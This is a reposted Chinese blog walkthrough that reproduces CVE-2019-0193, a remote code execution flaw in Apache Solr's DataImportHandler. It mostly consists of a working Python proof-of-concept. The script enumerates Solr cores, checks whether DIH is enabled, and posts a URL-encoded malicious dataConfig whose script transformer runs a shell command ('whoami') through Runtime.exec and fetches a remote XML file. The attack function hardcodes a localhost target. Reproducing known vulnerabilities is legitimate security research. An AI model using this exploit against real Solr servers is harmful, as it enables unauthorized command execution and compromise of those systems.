Solr:CVE-2019-0193复现

漏洞原理:当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含脚本,因此,会存在远程代码执行漏洞

漏洞版本:Apache Solr<8.2.0

复现过程

这里以solr 7.2.2版本为例:https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

开启solr:

.\bin\solr.cmd -e dih

Solr:CVE-2019-0193复现_第1张图片

访问http://127.0.0.1:8983/solr

Solr:CVE-2019-0193复现_第2张图片

如下图,随便点开一个core:

Solr:CVE-2019-0193复现_第3张图片

出现如下,界面:点开Dataimport功能,选择debug-mode:

Solr:CVE-2019-0193复现_第4张图片

 

 

 开始编辑debug-mode:

Solr:CVE-2019-0193复现_第5张图片

编辑好后,点击上图蓝色按钮:弹出计算器

Solr:CVE-2019-0193复现_第6张图片

 

 然后我们修改代码,让它去执行我们的命令:可以看到我们的命令被成功执行

Solr:CVE-2019-0193复现_第7张图片

 自己写了一个poc,需要输入IP和端口,代码如下:

import requests
import re
import sys

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0", "Content-type":"application/x-www-form-urlencoded"}
def verify(url):

    #获取cores名称
    get_cores_url = url + "/solr/admin/cores"

    Re = requests.get(get_cores_url, headers=headers)

    k = re.search(r'"name":"(.*)"', Re.text)[0]

    core = re.findall(r'"name":"(.*)"', k, re.S)[0]

    #验证是否开启data import Handler模块
    data_url = url + "/solr/"+ core +"/admin/mbeans?cat=QUERY&wt=json"

    Re0 = requests.get(data_url, headers=headers)

    if not "org.apache.solr.handler.dataimport.DataImportHandler" in Re0.text:

        print("未开启data import Handler功能,无法利用")
        return
    else:
        attack(url)

def attack(url):
    #执行命令whoami,并返回结果
    data_url = "http://127.0.0.1:8983/solr/solr/dataimport?_=1566799867523&indent=on&wt=json"
    data = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=solr&dataConfig=%3CdataConfig%3E%0A%0A%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A%0A++++++++++function+poc(row)%7B%0A%0A+var+bufReader+%3D+new+java.io.BufferedReader(new+java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar+result+%3D+%5B%5D%3B%0A%0Awhile(true)+%7B%0Avar+oneline+%3D+bufReader.readLine()%3B%0Aresult.push(+oneline+)%3B%0Aif(!oneline)+break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0A%0Areturn+row%3B%0A%0A%7D%0A%0A%0A++%5D%5D%3E%3C%2Fscript%3E%0A%0A++++++++%3Cdocument%3E%0A+++++++++++++%3Centity+name%3D%22entity1%22%0A+++++++++++++++++++++url%3D%22https%3A%2F%2Fraw.githubusercontent.com%2F1135%2Fsolr_exploit%2Fmaster%2FURLDataSource%2Fdemo.xml%22%0A+++++++++++++++++++++processor%3D%22XPathEntityProcessor%22%0A+++++++++++++++++++++forEach%3D%22%2FRDF%2Fitem%22%0A+++++++++++++++++++++transformer%3D%22script%3Apoc%22%3E%0A++++++++++++++++++++++++%3Cfield+column%3D%22title%22+xpath%3D%22%2FRDF%2Fitem%2Ftitle%22+%2F%3E%0A+++++++++++++%3C%2Fentity%3E%0A++++++++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport"
    Re1 = requests.post(data_url, data=data, headers=headers)
    kk = re.findall(r'"title":\["(.*)\\n', Re1.text, re.S)
    print(kk)

if __name__ == '__main__':
    #url是ip:port
    url = sys.argv[1]
    if "http://" not in url:
        url = "http://" + url
    verify(url)

  

 

转载于:https://www.cnblogs.com/xiaoqiyue/p/11413404.html

你可能感兴趣的:(Solr:CVE-2019-0193复现)